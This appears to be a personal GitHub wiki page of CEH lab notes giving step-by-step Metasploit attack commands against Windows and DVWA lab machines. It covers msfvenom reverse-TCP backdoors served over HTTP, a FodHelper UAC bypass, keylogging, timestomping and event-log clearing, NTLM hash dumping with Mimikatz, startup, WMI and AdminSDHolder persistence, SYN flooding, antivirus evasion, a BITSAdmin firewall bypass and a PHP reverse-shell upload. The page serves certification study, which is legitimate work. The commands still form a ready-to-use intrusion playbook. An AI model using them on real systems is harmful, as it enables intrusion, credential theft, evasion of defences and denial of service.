CEH_Metasploit - yenbohuang/techNotes GitHub Wiki

Metasploit:

Common Steps for Initialize Metasploit

sudo su
service postgresql start
msfconsole
db_status
exit

# Init DB
msfdb init
service postgresql restart
msfconsole
db_status

# Save scan result to "Test" and import to DB
nmap -Pn -sS -A -oX Test 10.10.1.0/24
db_import Test

General commands

Command	Note
`hosts`	List imported hosts from `nmap` report.
`services`	List imported services on detected hosts from `nmap` report.
`search portscan`	Search modules.
`back`	Revert to msf commandline.
`hosts -R`	Automatically set RHOSTS with the discovered hosts present in our database (imported from `nmap` report).

Network Scanning

SYN scan:

use auxiliary/scanner/portscan/syn
set INTERFACE eth0
set PORTS 80
set RHOSTS 10.10.1.5-23
set THREADS 50
run

TCP scan for open ports:

use auxiliary/scanner/portscan/tcp
set RHOSTS 10.10.1.22
run

Enumeration

Check "Windows version" and "Samba versions on Linux"

use auxiliary/scanner/smb/smb_version
set RHOSTS 10.10.1.5-23
set THREADS 11
run

System Hacking

Command	Note
`/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 11900`	Generate random piece of bytes.
`/usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -l 11900 -q 386F4337`	Finding offset.
`/usr/share/metasploit-framework/tools/exploit/nasm_shell.rb`	Convert assembly language into hex code.
`msfvenom -p windows/shell_reverse_tcp LHOST=[Local IP Address] LPORT=[Listening Port] EXITFUNC=thread -f c -a x86 -b "\x00"`	Generate Windows shell code.

General steps

Create shikata encoder (Polymorphic XOR Additive Feedback Encoder)

https://github.com/rapid7/metasploit-framework/blob/master/modules/encoders/x86/shikata_ga_nai.rb

# Create a malicious Windows executable file.
msfvenom -p windows/meterpreter/reverse_tcp --platform windows -a x86 -e x86/shikata_ga_nai -b "\x00" \
  LHOST=10.10.1.13 -f exe > /home/attacker/Desktop/<malicious file>

# Run Metasploit
msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 10.10.1.13
show options
exploit -j -z

# Start up Apache HTTPD and share/download/run <malicious file> on Windows.
cp /home/attacker/Desktop/<malicious file> /var/www/html/share/ 

# Back to Metasploit and launch Meterpreter shell
sessions -i 1

Create reverse TCP backdoor

# Generate reverse TCP backdoor
msfvenom -p windows/meterpreter/reverse_tcp lhost=10.10.1.13 lport=444 -f exe > /home/attacker/Desktop/<malicious file>

# Launch Metasploit
msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 10.10.1.13
set lport 444
run

# Share by httpd and install/run it on windows 11
cp /home/attacker/Desktop/<malicious file> /var/www/html/share/

# Check target system information
sysinfo
getuid

Bypass Windows UAC protection via the FodHelper Registry Key

# Background the current session.
background

# Bypass Windows UAC protection via the FodHelper Registry Key
use exploit/windows/local/bypassuac_fodhelper

# 1 is the current Meterpreter session which is running in the background.
set session 1

# Check if the settings are correct:
show options

set LHOST 10.10.1.13

# 0 indicates nothing, but the Exploit Target ID.
set TARGET 0
exploit

# Elevate previleges
getsystem -t 1
getuid

Windows 11

Exploit Client-Side Vulnerabilities and Establish a VNC Session

https://www.kali.org/tools/powersploit/

# Generate payload
msfvenom -p windows/meterpreter/reverse_tcp --platform windows -a x86 -f exe LHOST=10.10.1.13 \
  LPORT=444 -o /home/attacker/Desktop/Test.exe

# Start up Apache httpd for sharing "Test.exe" to Windows.
cp /home/attacker/Desktop/Test.exe /var/www/html/share/ 

# Enter Metasploit console:
msfconsole

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 10.10.1.13
set LPORT 444
exploit

# Visit `http://10.10.1.13/share` and download/run `Test.exe` on Windows.

# If the Meterpreter shell is not automatically connected to the session:
sessions -i 1

# After we have a tunnel to Windows, check if we have access:
sysinfo

upload /root/PowerSploit/Privesc/PowerUp.ps1 PowerUp.ps1
shell

# "PowerUp.ps1" is under "c:\Users\Admin\Downloads"
powershell -ExecutionPolicy Bypass -Command ". .\PowerUp.ps1;Invoke-AllChecks"

# Revert to the Meterpreter session.
exit

# Exploit VNC vulnerability and access VNC
run vnc

Escalate Privileges using Privilege Escalation Tools and Exploit Client-Side Vulnerabilities

# Follow "General step: Create shikata encoder" and deploy malicious file called "Exploit.exe".

# Check user ID
getuid

# Copy "BeRoot" folder on Windows 11 "e:\CEH-Tools\CEHv12\Module 06 System Hacking\Privilege Escalation Tools\BeRoot" to Parrot Security "Desktop" folder.

upload /home/attacker/Desktop/BeRoot/beRoot.exe
shell

# Displaying information about service names along with their permissions, keys, writable directories, locations, and other vital data.
beRoot.exe

# Copy "Seatbelt.exe" on Windows 11 "e:\CEH-Tools\CEHv12\Module 06 System Hacking\Github Tools\" to Parrot Security "Desktop" folder.

upload /home/attacker/Desktop/Seatbelt.exe
shell

# Gather information about AMSIProviders, AntiVirus, AppLocker etc.
Seatbelt.exe -group=system

# Gather information about ChromiumPresence, CloudCredentials, CloudSyncProviders, CredEnum, dir, DpapiMasterKeys etc.
Seatbelt.exe -group=user

# Gather information about ChromiumBookmarks, ChromiumHistory, ExplicitLogonEvents, FileInfo etc.
Seatbelt.exe -group=misc
exit

# Follow "General step: Bypass Windows UAC protection via the FodHelper Registry Key"
# Check if the settings are correct at "show options" step:
# EXITFUNC -> process
# LPORT -> 4444

# Extracts the NTLM hashes
run post/windows/gather/smart_hashdump

# Clear the event logs
clearev

Hack a Windows Machine using Metasploit and Perform Post-Exploitation using Meterpreter

# Prepare "C:\Users\Admin\Downloads\Secret.txt" with secret content on Windows 11.

# Follow "General step: Create shikata encoder" and deploy malicious file called "Backdoor.exe".
# Make sure that both the "Backdoor.exe" and "Secret.txt" files are stored in the same directory (here, "Downloads").

# Collect target system information
sysinfo
ipconfig
getuid
pwd
ls
cat Secret.txt

# Change the MACE (modified, accessed, created, entry) attributes.
# Modified (-m), Accessed (-a), Created (-c), and Entry Modified (-e).
timestomp Secret.txt -v
timestomp Secret.txt -m "02/11/2018 08:10:03"
timestomp Secret.txt -v

# Changing directories
cd
pwd
cd C:/
pwd

# Locate files
search -f pagefile.sys

# key-logging
keyscan_start

# Login Windows, start text editor, and type something. Then, go back to Parrot Security.

# Dumps all captured keystrokes
keyscan_dump

# Check user's idle time
idletime

# Open a shell in meterpreter
shell

# Retrieve the directory names with hidden attributes
dir /a:h

# List all the available services
sc queryex type=service state=all

# Check firewall
netsh firewall show state
netsh firewall show config

# Check installed software
wmic /node:"" product get name,version,vendor

# Check processor’s details
wmic cpu get

# Retrieve login names and SIDs
wmic useraccount get name,sid

# Reboot the target system
wmic os where Primary='TRUE' reboot

# Start/stop network service
net stop
net start

# Turn off firewall service
netsh advfirewall set currentprofile state off
netsh advfirewall set allprofiles state off

# Retrieve all log files
findstr /E ".log" > log.txt

Escalate Privileges by Bypassing UAC and Exploiting Sticky Keys

# Follow "General step: Create reverse TCP backdoor" and deploy malicious file called "Windows.exe".

# Follow "General step: Bypass Windows UAC protection via the FodHelper Registry Key"

# Background the current session.
background

# Exploit the sticky keys feature
use post/windows/manage/sticky_keys

# List the sessions in meterpreter.
sessions i*

# Set the privileged session as the current session
set session 2
exploit

# Login non-admin account on Windows and press Shift key 5 times.
# This will open a command prompt on the lock screen with System privileges.
# Use whoami in command console and check if this is Windows system account.

Escalate Privileges to Gather Hashdump using Mimikatz

https://github.com/ParrotSec/mimikatz

# Follow "General step: Create reverse TCP backdoor" and deploy malicious file called "backdoor.exe".

# Follow "General step: Bypass Windows UAC protection via the FodHelper Registry Key"

# Load mimikatz
load kiwi
help kiwi

# Load NTLM Hash of all users
lsa_dump_sam

# View the LSA Secrets Login hashes type
# NTLM hash of Admin is "92937945b518814341de3f726500d4ff".
lsa_dump_secrets

# Change the password of Admin
password_change -u Admin -n <NTLM hash of Admin acquired in previous step> -P <New Password>

# Check if the change is successful?
lsa_dump_sam

# Login Windows 11 by Admin account with new password. Remember change the password back for next lab task.

Maintain Persistence by Abusing Boot or Logon Autostart Execution

# Follow "General step: Create reverse TCP backdoor" and deploy malicious file called "exploit.exe".

# Follow "General step: Bypass Windows UAC protection via the FodHelper Registry Key"

# Follow "General step: Create reverse TCP backdoor" and deploy malicious file called "backdoor.exe" with "lport=8080".
# Do not login Windows 11 and download/run "payload.exe". Upload "payload.exe" to Windows startup folder by "upload" command
# in this msfconsole.
cd "C:\\ProgramData\\Start Menu\\Programs\\Startup"
pwd
upload /home/attacker/payload.exe

# Switch to Windows 11 and reboot. This backdoor will be reconnected every time when Windows 11 was rebooted.

Perform a DoS Attack (SYN Flooding) on a Target Host using Metasploit

# check victim
nmap -p 21 10.10.1.11

# attack
msfconsole
use auxiliary/dos/tcp/synflood
show options

set RPORT 21

# Target IP Address
set RHOST 10.10.1.11

# Spoofable IP Address
set SHOST 10.10.1.19

exploit

Windows Server 2019

Privilege Escalation and Maintain Persistence using WMI

# Follow "General step: Create reverse TCP backdoor" and deploy TWO malicious files called "Payload.exe" and "wmi.exe".
# Run "Payload.exe" on Windows Server 2019 first and keep "wmi.exe" for WMI persistence.

# Deploy "Wmi-Persistence"
upload /home/attacker/Wmi-Persistence-master C:\\Users\\Administrator\\Downloads
load powershell
powershell_shell
Import-Module "C:\Users\Administrator\Downloads\WMI-Persistence.ps1"
Install-Persistence -Trigger Startup -Payload "C:\Users\Administrator\Downloads\wmi.exe"

# Run in another window with root privilege
msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 10.10.1.13
set LPORT 444
exploit

# Go back to previous window, "ctrl + c" and exit powershell.
# Reboot Windows Server 2019. After a couple minutes, meterpreter is opened.

Windows Server 2022

Maintain Domain Persistence by Exploiting Active Directory Objects

https://github.com/PowerShellEmpire/PowerTools

# Follow "General step: Create reverse TCP backdoor" and deploy malicious file called "Exploit.exe".

# Add a standard user to the AdminSDHolder directory and from there to the Domain Admins group, to maintain persistence in the domain

upload -r /home/attacker/PowerTools-master C:\\Users\\Administrator\\Downloads
shell
cd C:\Windows\System32
powershell
cd C:\Users\Administrator\Downloads\PowerView
Import-Module ./powerview.psm1

Add-ObjectAcl -TargetADSprefix 'CN=AdminSDHolder,CN=System' -PrincipalSamAccountName Martin -Verbose -Rights All

# Check "ActiveDirectoryRights: GenericAll"
Get-ObjectAcl -SamAccountName "Martin" -ResolveGUIDs

# Reduce the time interval of SDProp to 3 minutes
REG ADD HKLM\SYSTEM\CurrentControlSet\Services\NTDS\Parameters /V AdminSDProtectFrequency /T REG_DWORD /F /D 300

# Add Martin to Domain Admins group
net group "Domain Admins" Martin /add /domain

# Other PowerView commands
Get-ADDomain
Get-NetDomain
Get-DomainPolicy
Get-NetDomainController
Get-NetUser
Get-NetComputer
Get-NetGroup
Invoke-ShareFinder -Verbose
Get-NetForest
Get-NetGPO
Get-NetGPO | select displayname

# Users with modification rights for a group
Get-NetGPO | %{Get-ObjectAcl -ResolveGUIDs -Name $_.Name}

Evading IDS, Firewalls, and Honeypots

Bypass Antivirus using Metasploit Templates

Check windows.exe and bypass.exe. Virus detected by VirusTotal is less in bypass.exe.

msfvenom -p windows/shell_reverse_tcp lhost=10.10.1.13 lport=444 -f exe > /home/attacker/Windows.exe

# Change size to 4000 in source code
pluma /usr/share/metasploit-framework/data/templates/src/pe/exe/template.c

cd /usr/share/metasploit-framework/data/templates/src/pe/exe/
i686-w64-mingw32-gcc template.c -lws2_32 -o evasion.exe

msfvenom -p windows/shell_reverse_tcp lhost=10.10.1.13 lport=444 -x /usr/share/metasploit-framework/data/templates/src/pe/exe/evasion.exe -f exe > /home/attacker/bypass.exe

Bypass Firewall through Windows BITSAdmin

Run in Parrot Security:

msfvenom -p windows/meterpreter/reverse_tcp lhost=10.10.1.13 lport=444 -f exe > /home/attacker/Exploit.exe

# start httpd and share it under http://10.10.1.13/share/Exploit.exe

Turn on Windowss Server 2019 firewall.
Run in Power Shell:

bitsadmin /transfer Exploit.exe http://10.10.1.13/share/Exploit.exe c:\Exploit.exe

We can see that Exploit.exe is still transferred by BITSAdmin.

Hacking Web Applications

Exploit a File Upload Vulnerability at Different Security Levels

# Generate payload
msfvenom -p php/meterpreter/reverse_tcp LHOST=10.10.1.13 LPORT=4444 -f raw

# Save the generated payload (PHP scripts) to "upload.php".
# Login DMWA on Windows 2022: http://10.10.1.22:8080/dvwa/login.php
# Downgrade DVWA security to "Low", then, upload the file by "File Upload" web page.

msfconsole

use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set LHOST 10.10.1.13
set LPORT 4444 
run

# Visit http://10.10.1.22:8080/dvwa/hackable/uploads/upload.php
# This will execute the uploaded payload.

# Switch back to Metasploit and view the system details of the victim machine.
sysinfo

Repeat the steps but:

Save the payload as "medium.php.jpg".
Downgrade DVWA security level to "medium", then, upload the file by "File Upload" web page.
Intercept the request and rename "medium.php.jpg" as "medium.php".
Visit http://10.10.1.22:8080/dvwa/hackable/uploads/medium.php